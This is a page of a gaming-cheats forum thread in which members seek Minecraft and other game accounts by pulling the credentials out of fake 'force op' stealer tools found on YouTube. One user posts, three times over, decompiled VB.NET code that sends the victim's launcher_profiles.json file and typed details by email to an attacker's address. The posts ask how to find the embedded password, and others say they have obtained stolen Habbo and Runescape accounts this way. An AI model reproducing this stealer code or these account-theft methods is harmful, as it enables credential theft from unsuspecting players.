Page 3 of 3 FirstFirst 123
Results 31 to 45 of 45
  1. #31
    LordPankake's Avatar
    Join Date
    Aug 2012
    Gender
    male
    Posts
    1,010
    Reputation
    260
    Thanks
    2,466
    My Mood
    Angry
    Quote Originally Posted by antflga View Post
    What if it says Me.email and Me.password?
    It's either one thing or another...

    1. The coder is using info stored in another file
    2. The original coder is absolutely retarded and forgot to put in his credentials.

  2. #32
    unnamed.fake123's Avatar
    Join Date
    Apr 2013
    Gender
    male
    Posts
    6
    Reputation
    10
    Thanks
    0
    Anyone can help me?
    I got one force op and found this:

    Code:
    	Private Sub Sendemail()
    			Dim smtpClient As SmtpClient = New SmtpClient()
    			smtpClient.Credentials = New NetworkCredential("first.email(at)aol.com", Me.Label5.Text)
    			smtpClient.Port = 587
    			smtpClient.Host = "smtp.aol.com"
    			smtpClient.EnableSsl = True
    			Dim mailMessage As MailMessage = New MailMessage()
    			Dim item As Attachment = New Attachment(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\.minecraft\launcher_profiles.json")
    			mailMessage.From = New MailAddress("first.email(at)aol.com", "A New Alt", Encoding.UTF8)
    			mailMessage.Subject = "A New Alt"
    			mailMessage.[To].Add("secondary.email(at)gmail.com")
    			mailMessage.Attachments.Add(item)
    			mailMessage.Body = String.Concat(New String()() = { Me.TextBox1.Text, " ", Me.TextBox2.Text, " ", Me.TextBox3.Text })
    			smtpClient.SendAsync(mailMessage, Nothing)
    		End Sub
    So what is this "Label5" and where can I find the password? And why 2 different emails?

    PS: I removed the emails.

    Thanks!

  3. #33
    ImMalkah's Avatar
    Join Date
    Apr 2013
    Gender
    male
    Location
    GTA Section
    Posts
    2,779
    Reputation
    370
    Thanks
    2,699
    My Mood
    Devilish
    Quote Originally Posted by unnamed.fake123 View Post
    Anyone can help me?
    I got one force op and found this:

    Code:
    	Private Sub Sendemail()
    			Dim smtpClient As SmtpClient = New SmtpClient()
    			smtpClient.Credentials = New NetworkCredential("first.email(at)aol.com", Me.Label5.Text)
    			smtpClient.Port = 587
    			smtpClient.Host = "smtp.aol.com"
    			smtpClient.EnableSsl = True
    			Dim mailMessage As MailMessage = New MailMessage()
    			Dim item As Attachment = New Attachment(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\.minecraft\launcher_profiles.json")
    			mailMessage.From = New MailAddress("first.email(at)aol.com", "A New Alt", Encoding.UTF8)
    			mailMessage.Subject = "A New Alt"
    			mailMessage.[To].Add("secondary.email(at)gmail.com")
    			mailMessage.Attachments.Add(item)
    			mailMessage.Body = String.Concat(New String()() = { Me.TextBox1.Text, " ", Me.TextBox2.Text, " ", Me.TextBox3.Text })
    			smtpClient.SendAsync(mailMessage, Nothing)
    		End Sub
    So what is this "Label5" and where can I find the password? And why 2 different emails?

    PS: I removed the emails.

    Thanks!
    Bro, that looks like a phisher source code...

    MPGH HISTORY:

    Registered Since 4-23-2013
    Editor 09-04-2013 - unknown
    Minion 10-22-2013 - 1-18-2014
    Donator 12-31-2014 - present
    Premium Seller 12-31-2016 - present
    Minion 03-15-2017 - I forgot

  4. #34
    unnamed.fake123's Avatar
    Join Date
    Apr 2013
    Gender
    male
    Posts
    6
    Reputation
    10
    Thanks
    0
    Quote Originally Posted by Kenshin13 Jr View Post
    Bro, that looks like a phisher source code...
    Its from one force op that I found on youtube

    Very similar with tutorial examples, but the difference is that in the place of "password" has this "Me.Label5.Text" and idk where to find the real password...

  5. #35
    ayed12345's Avatar
    Join Date
    May 2013
    Gender
    male
    Location
    Texting Some People That I Hate Them.
    Posts
    438
    Reputation
    10
    Thanks
    70
    My Mood
    Crappy
    i found this one also XD

  6. #36
    chococomaxim's Avatar
    Join Date
    Feb 2013
    Gender
    male
    Posts
    6
    Reputation
    10
    Thanks
    0
    My Mood
    Bored
    Are you guys getting all the force ops from youtube? I found some on youtube but they all sent me to file ice and sites like that
    Last edited by chococomaxim; 07-20-2013 at 04:16 PM.

  7. #37
    Chessmaster98's Avatar
    Join Date
    Jul 2013
    Gender
    male
    Posts
    60
    Reputation
    10
    Thanks
    1
    My Mood
    Amazed
    I haven't gotten any alts off this but this was worth a try. Thanks for showing.

  8. #38
    cgallagher21's Avatar
    Join Date
    Jun 2010
    Gender
    male
    Posts
    1,627
    Reputation
    11
    Thanks
    325
    My Mood
    Angelic
    I haven't really gotten any minecraft alts, but i have gotten tons of habbo and runescape accounts.

  9. #39
    unnamed.fake123's Avatar
    Join Date
    Apr 2013
    Gender
    male
    Posts
    6
    Reputation
    10
    Thanks
    0
    Quote Originally Posted by unnamed.fake123 View Post
    Anyone can help me?
    I got one force op and found this:

    Code:
    	Private Sub Sendemail()
    			Dim smtpClient As SmtpClient = New SmtpClient()
    			smtpClient.Credentials = New NetworkCredential("first.email(at)aol.com", Me.Label5.Text)
    			smtpClient.Port = 587
    			smtpClient.Host = "smtp.aol.com"
    			smtpClient.EnableSsl = True
    			Dim mailMessage As MailMessage = New MailMessage()
    			Dim item As Attachment = New Attachment(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\.minecraft\launcher_profiles.json")
    			mailMessage.From = New MailAddress("first.email(at)aol.com", "A New Alt", Encoding.UTF8)
    			mailMessage.Subject = "A New Alt"
    			mailMessage.[To].Add("secondary.email(at)gmail.com")
    			mailMessage.Attachments.Add(item)
    			mailMessage.Body = String.Concat(New String()() = { Me.TextBox1.Text, " ", Me.TextBox2.Text, " ", Me.TextBox3.Text })
    			smtpClient.SendAsync(mailMessage, Nothing)
    		End Sub
    So what is this "Label5" and where can I find the password? And why 2 different emails?

    PS: I removed the emails.

    Thanks!
    Someone?

  10. #40
    LordPankake's Avatar
    Join Date
    Aug 2012
    Gender
    male
    Posts
    1,010
    Reputation
    260
    Thanks
    2,466
    My Mood
    Angry
    Quote Originally Posted by unnamed.fake123 View Post
    Someone?
    Either somebody really fucked up copy pasting force op code or the decompiler derped.

  11. #41
    Critic's Avatar
    Join Date
    Jul 2013
    Gender
    male
    Posts
    3
    Reputation
    10
    Thanks
    0
    Wow this tutorial is legit, but I'm afraid everyone will have done this to all the videos

  12. #42
    ImMalkah's Avatar
    Join Date
    Apr 2013
    Gender
    male
    Location
    GTA Section
    Posts
    2,779
    Reputation
    370
    Thanks
    2,699
    My Mood
    Devilish
    Quote Originally Posted by Critic View Post
    Wow this tutorial is legit, but I'm afraid everyone will have done this to all the videos
    Just search what you want up and click on filters and click this week. That should do it.

    MPGH HISTORY:

    Registered Since 4-23-2013
    Editor 09-04-2013 - unknown
    Minion 10-22-2013 - 1-18-2014
    Donator 12-31-2014 - present
    Premium Seller 12-31-2016 - present
    Minion 03-15-2017 - I forgot

  13. #43
    Chessmaster98's Avatar
    Join Date
    Jul 2013
    Gender
    male
    Posts
    60
    Reputation
    10
    Thanks
    1
    My Mood
    Amazed
    Now we cant use this method anymore since there are no more last logins. ;(

  14. #44
    Smileyblaster's Avatar
    Join Date
    Jul 2012
    Gender
    male
    Posts
    241
    Reputation
    10
    Thanks
    232
    My Mood
    Amused
    Quote Originally Posted by Chessmaster98 View Post
    Now we cant use this method anymore since there are no more last logins. ;(
    What are you talking about? There still is last logins and all that junk.... I still have mine and my friend does also.

  15. #45
    Chessmaster98's Avatar
    Join Date
    Jul 2013
    Gender
    male
    Posts
    60
    Reputation
    10
    Thanks
    1
    My Mood
    Amazed
    I deleted mine

Page 3 of 3 FirstFirst 123

Similar Threads

  1. The server side Anti Hax and how to get around it.
    By recont23 in forum ArmA 3 Marketplace
    Replies: 9
    Last Post: 05-29-2013, 07:09 PM
  2. The truth behind Religion.
    By Snowkip in forum Debate Fort
    Replies: 55
    Last Post: 05-19-2013, 04:27 AM
  3. Minecraft:Hostile mobs and how to kill them
    By saiprem in forum Minecraft Discussions
    Replies: 1
    Last Post: 01-29-2013, 06:01 AM
  4. The truth behind Shehwaz :(
    By J in forum General
    Replies: 28
    Last Post: 12-18-2010, 12:47 PM
  5. Truth behind the US Government.
    By Dave84311 in forum General
    Replies: 7
    Last Post: 06-01-2007, 01:39 PM

Tags for this Thread